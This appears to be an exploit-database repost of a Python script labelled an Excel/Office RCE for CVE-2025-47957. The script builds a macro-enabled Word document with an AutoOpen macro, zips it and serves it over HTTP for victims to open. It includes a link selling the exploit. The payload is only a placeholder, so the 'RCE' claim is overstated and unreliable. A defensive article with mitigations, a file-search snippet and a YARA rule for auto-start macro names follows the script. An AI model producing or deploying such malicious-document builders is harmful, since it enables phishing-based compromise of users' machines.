Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)

Exploit Author: nu11secur1ty Analysis Author: www.bubbleslearn.ir Category: Local Language: Python Published Date: 2025-06-20

# Titles: Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)
# Author: nu11secur1ty
# Date: 06/16/2025
# Vendor: Microsoft
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751
# CVE-2025-47957
# Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise 

## Description:
The attacker can trick any user into opening and executing their code by
sending a malicious DOCX file via email or a streaming server. After the
execution of the victim, his machine can be infected or even worse than
ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE
MACROS OPTIONS FROM YOUR OFFICE 365!!!

STATUS: HIGH-CRITICAL Vulnerability


[+]Exploit:

```
#!/usr/bin/python
# CVE-2025-47957 by nu11secur1ty
import os
import time
import zipfile
import threading
import http.server
import socket
import socketserver
import win32com.client

def get_local_ip():
    """Get the LAN IP address of the current machine."""
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("8.8.8.8", 80))  # External DNS, just for routing
        ip = s.getsockname()[0]
        s.close()
        return ip
    except:
        return "127.0.0.1"

def create_docm_with_auto_macro(filename):
    script_dir = os.path.dirname(os.path.abspath(__file__))
    full_path = os.path.join(script_dir, filename)

    word = win32com.client.Dispatch("Word.Application")
    word.Visible = False
    doc = word.Documents.Add()

    doc.Content.Text = "This document contains an auto-starting macro."

    vbproject = doc.VBProject
    vbcomponent = vbproject.VBComponents.Add(1)  # Standard Module

    macro_code = '''
Sub AutoOpen()
    Call YOUR_PoC
End Sub

Sub YOUR_PoC()
    Dim Program As String
    Dim TaskID As Double
    On Error Resume Next
    Program = "YOUR_EXPLOIT_HERE"
    TaskID = YOUR_TASK_HERE
    If Err <> 0 Then
        MsgBox "Can't start " & Program
    End If
End Sub
'''
    vbcomponent.CodeModule.AddFromString(macro_code)

    wdFormatXMLDocumentMacroEnabled = 13
    doc.SaveAs(full_path, FileFormat=wdFormatXMLDocumentMacroEnabled)
    doc.Close()
    word.Quit()

    print(f"[+] Macro-enabled .docm saved at: {full_path}")
    return full_path

def compress_to_zip(filepath):
    zip_path = filepath + '.zip'
    with zipfile.ZipFile(zip_path, 'w') as zipf:
        zipf.write(filepath, arcname=os.path.basename(filepath))
    print(f"[+] Compressed to ZIP: {zip_path}")
    return zip_path

def start_http_server(directory, port=8000):
    os.chdir(directory)
    handler = http.server.SimpleHTTPRequestHandler
    httpd = socketserver.TCPServer(("", port), handler)
    ip = get_local_ip()
    print(f"[+] HTTP server running at: http://{ip}:{port}/")

    thread = threading.Thread(target=httpd.serve_forever)
    thread.daemon = True
    thread.start()
    return httpd

if __name__ == "__main__":
    filename = "CVE-2025-47957.docm"
    docm_path = create_docm_with_auto_macro(filename)
    zip_path = compress_to_zip(docm_path)
    server = start_http_server(os.path.dirname(docm_path))

    try:
        print("[*] Server running — press Ctrl+C to stop...")
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[!] Ctrl+C detected — shutting down server...")
        server.shutdown()
        print("[+] The Exploit Server stopped. Goodbye!")

```

# Reproduce:
[href](https://www.youtube.com/watch?v=r4NsGrO56yo)

# Buy an exploit only:
[href](https://satoshidisk.com/pay/COeJqt)

# Time spent:
01:37:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

-- 

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Microsoft Excel LTSC 2024 — Remote Code Execution (RCE): Overview, Impact, and Defensive Guidance

This article summarizes publicly reported RCE issues affecting Microsoft Office/Excel variants (examples: CVE‑2025‑47957 and related reports), the typical attack surface involved with macro‑enabled documents, the real-world risk to organisations, and practical defensive measures for administrators, security engineers and users. The focus is defensive: understanding the vulnerability class, detection approaches, hardening controls and safe testing practices. No exploit development or step‑by‑step offensive instructions are included.

Executive summary

Multiple high‑severity remote code execution vulnerabilities reported in 2025 involve Microsoft Office (Excel/Word) handling of macro‑enabled documents. Attackers typically rely on social engineering to prompt users into opening weaponized documents that, if macros are permitted to run, can achieve arbitrary code execution in the victim's context. The consequences range from credential theft and persistent access to full machine compromise.

Key items

Example CVEs: CVE‑2025‑47957 (publicly referenced) and related Office RCE reports.
Affected products include Microsoft Office LTSC 2024, LTSC 2021 and Microsoft 365 Apps for Enterprise (patch status varies by build).
Main attack vector: macro‑enabled documents (.docm, .xlsm, .pptm) delivered via email, downloads or file shares.
Primary mitigations: apply vendor patches, block or restrict macros, enable Office protections (Protected View / Application Guard), and use endpoint and mail defenses.

Vulnerability class — how these RCEs generally work (high level)

These vulnerabilities fall into two related classes:

Document parsing/handling bugs in Office components that allow crafted files to trigger memory corruption or logic flaws leading to code execution.
Abuse of VBA/Office automation macro functionality (AutoOpen, Workbook_Open, Auto_Open, etc.) where social engineering convinces users to enable macros that then run arbitrary code.

From a defensive standpoint the important takeaway is the chaining of two elements: (1) a delivery mechanism (malicious document), and (2) a runtime execution mechanism (enabled macros or exploitation of a parsing bug). Preventing either stage materially reduces risk.

Affected versions and exposure matrix

Product	Typical exposure	Recommended action
Microsoft Office LTSC 2024	High — macro-enabled documents processed by Excel/Word	Apply Microsoft security updates; enforce macro restrictions and Protected View
Microsoft Office LTSC 2021	High — similar attack surface	Patch and harden policies; enable EDR monitoring
Microsoft 365 Apps for Enterprise	High but frequently patched via Windows Update / Office CDN	Maintain current updates and follow cloud/tenant protection guidance

Impact and real‑world risks

Successful exploitation can yield arbitrary code execution under the logged user account and enable persistence, lateral movement, data exfiltration or ransomware deployment.
Risk is amplified where users have local administrative rights, where macros are allowed by policy, or where endpoints lack advanced EDR/behavioral controls.
Highly targeted attacks often bypass basic filtering by using convincing social engineering, file formats that appear legitimate, and multi‑stage payloads.

Detection and hunting — practical defensive examples

Below are safe, defensive examples you can use to locate macro‑enabled documents in enterprise file stores, and a sample YARA rule to flag Office files containing common auto‑start macro names. These examples are for detection and response — not exploit development.

PowerShell: enumerate macro‑enabled Office files (defensive)

Get-ChildItem -Path "C:\Shares" -Recurse -Include *.docm,*.xlsm,*.pptm `
  | Select-Object FullName,Length,LastWriteTime,Attributes `
  | Export-Csv -Path C:\Temp\macro_files_report.csv -NoTypeInformation

Explanation: This PowerShell snippet recursively searches a specified path for macro‑enabled Office files (.docm, .xlsm, .pptm), selects key attributes, and exports results to CSV for review. Use this in a read‑only mode on shared stores to prioritize inspection and apply quarantine or scanning.

YARA (defensive pattern) to flag Office files with auto‑start macro names

rule Suspicious_Office_AutoMacro
{
  meta:
    description = "Detect Office OOXML files containing common auto-start macro identifiers"
    author = "Defensive Team"
    date = "2025-06"
  strings:
    $auto1 = "AutoOpen" nocase
    $auto2 = "Workbook_Open" nocase
    $auto3 = "Auto_Open" nocase
    $part = "word/" ascii
  condition:
    $part and ( $auto1 or $auto2 or $auto3 )
}

Explanation: This YARA rule looks for Office OOXML container parts (e.g., word/) and searches for strings commonly used to indicate auto‑executing macros. It is intended for defensive scanning of file stores and archives. Tune the rule to reduce false positives and only run it on known targets or in a sandboxed analysis environment.

Mitigations — immediate and long‑term

Apply a layered approach combining vendor updates, configuration hardening, email and endpoint controls, and user education.

Install vendor patches immediately: Prioritise Microsoft security updates for Office and Windows. Check Microsoft Security Response Center (MSRC) advisories for mitigation specifics and hotfixes.
Disable or tightly restrict VBA macros: Use Group Policy or Intune to set "Disable VBA macros without notification" for enterprise, and enable "Block macros from the internet" to automatically block files originating from the web.
Enforce Protected View: Keep Protected View for files from the internet enabled so untrusted documents open in a sandboxed mode by default.
Require signed macros and application control: Whitelist only signed macros or use AppLocker / Windows Defender Application Control to restrict execution of unsigned Office macros.
Email gateway scanning and attachment controls: Use anti‑phishing/attachment sandboxing to block or detonate macro‑enabled attachments and quarantine suspicious messages.
Endpoint Detection & Response (EDR): Ensure EDR agents are deployed and tuned to detect anomalous child processes spawned by Office apps (e.g., cmd.exe, powershell.exe starting from winword.exe or excel.exe).
Least privilege: Remove local admin rights where possible to limit the blast radius of an exploited host.
Network segmentation and monitoring: Limit lateral movement opportunities and monitor for unusual outbound connections after document opens.

Hardening checklist for administrators

Confirm Office and Windows patch level across the estate; apply updates per vendor advisories.
Deploy Group Policy / Intune policies to block macros from the internet and disable VBA macros by default.
Enable Office Protected View, Application Guard for Office and macros signing enforcement.
Configure mail filters to strip or quarantine macro-enabled attachments and enforce sender protections (SPF, DKIM, DMARC).
Use endpoint controls to alert on Office processes spawning scripting engines or network tools.
Run periodic scans (e.g., PowerShell example above) against file shares to find unexpected macro-enabled files.
Educate users: never enable macros in documents from untrusted or unexpected senders; validate via out‑of‑band channels.

Safe testing and incident response guidance

Only analyze suspicious documents in an isolated lab environment (air‑gapped or VM snapshots). Do not open unknown macro‑enabled docs on production systems.
Capture memory and endpoint telemetry (process tree, network connections, loaded modules) during controlled analysis to support detection rule creation.
If an incident is suspected, isolate the host, collect evidence (event logs, Office MRU lists, macros), and escalate to your incident response team or vendor.
Notify affected parties and follow responsible disclosure practices when working with vendors and coordinated vulnerability disclosure timelines.

References and resources

Microsoft Security Response Center (MSRC) — official advisories and updates (search by CVE number).
CVE listings (MITRE) — for canonical CVE details and references.
Vendor guidance for macro hardening: "Block macros from the internet", Protected View and Application Guard for Office.

Final note: Macro‑enabled documents continue to be a significant attack vector. The most effective defensive posture combines rapid patching, macro restrictions, email filtering, endpoint behavioral detection, and continuous user education. If you manage an enterprise environment, treat macro policy changes and Office updates as high priority controls and test hardening changes in a controlled manner before broad rollout.